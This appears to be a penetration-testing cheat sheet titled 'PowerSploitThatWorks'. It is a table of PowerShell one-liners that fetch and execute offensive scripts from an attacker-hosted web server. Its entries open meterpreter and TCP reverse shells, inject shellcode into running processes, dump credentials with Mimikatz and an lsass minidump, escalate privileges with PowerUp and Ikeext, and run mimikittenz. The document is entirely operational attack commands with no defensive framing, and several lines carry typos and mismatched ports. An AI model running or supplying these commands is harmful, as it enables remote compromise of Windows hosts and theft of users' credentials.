PowerSploitThatWorks
PowerSploit - Code Execution (Reverse Shell using meterpreter) | |
Invoke-Shellcode | |
cd /Tools/PowerSploit/CodeExecution/ | |
python -m SimpleHTTPServer 7001 | |
cd /Tools/fast_meterpreter.rb | |
ATTACKERIP - LISTENERPORT - 1 - no - http://ATTACKERIP/WEBSERVERPORT(7001) - | |
powershell -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://IPADDRESS:7001/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -lhost X.X.X.X -lport XXXX -Force" | |
PowerSploit - Code Execution (Reverse Shell) | |
cd /Tools/PowerSploit/CodeExecution/ | |
python -m SimpleHTTPServer 7008 | |
powershell -NoProfile -ExecutionPolicy unrestrcited -Command IEX (New-Object Net.WebClient).DownloadString('http://IPADDRESS:7008/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress ATTACKERIP -Port XXXX; | |
Invoke-Shellcode (Inject reverse_shell in an existing process) | |
On victim: Get-Process (Find stable process) | |
powershell -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://IPADDRESS:7001/Invoke-Shellcode.ps1'); Invoke-Shellcode -ProcessID XXX -Payload windows/meterpreter/reverse_http -lhost X.X.X.X -lport XXXX" | |
PowerSploit - Exfiltration | |
Invoke-Mimikatz (32bits) | |
cd /Tools/PowerSploit/Invoke-Mimikatz.ps1 | |
python -m SimpleHTTPServer 7002 | |
powershell -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://IPADDRESS:7002/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
Invoke-Mimikatz (64bits) | |
Search for lsass process id under Powershell using "Get-Process" | |
cd /Tools/PowerSploit/Invoke-Mimikatz.ps1 | |
python -m SimpleHTTPServer 7002 | |
powershell -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://IPADDRESS:7002/Out-Minidump.ps1')";Get-Process -Id XXX;" | |
PowerSploit - Privesc | |
PowerUp | |
cd /Tools/PowerSploit | |
python m SimpleHTTPServer 7003 | |
powershell -nop -exec bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://IPADDRESS:7003/PowerUp.ps1')"; Invoke-AllChecks;" | |
Privilege Escalation - Ikeext-Privesc | |
cd /Tools/Ikeext-Privesc | |
python -m SimpleHTTPServer 7004 | |
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://IPADRESS:7004/Ikeext-Privesc.ps1'); InvokeCheck -verbose;" | |
PostExploitation - Mimikittenz | |
cd /Tools/mimikittenz | |
python -m SimpleHTTPServer 7007 | |
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://IPADRESS:7006/Invoke-mimikittenz.ps1');Invoke-mimikittenz;" |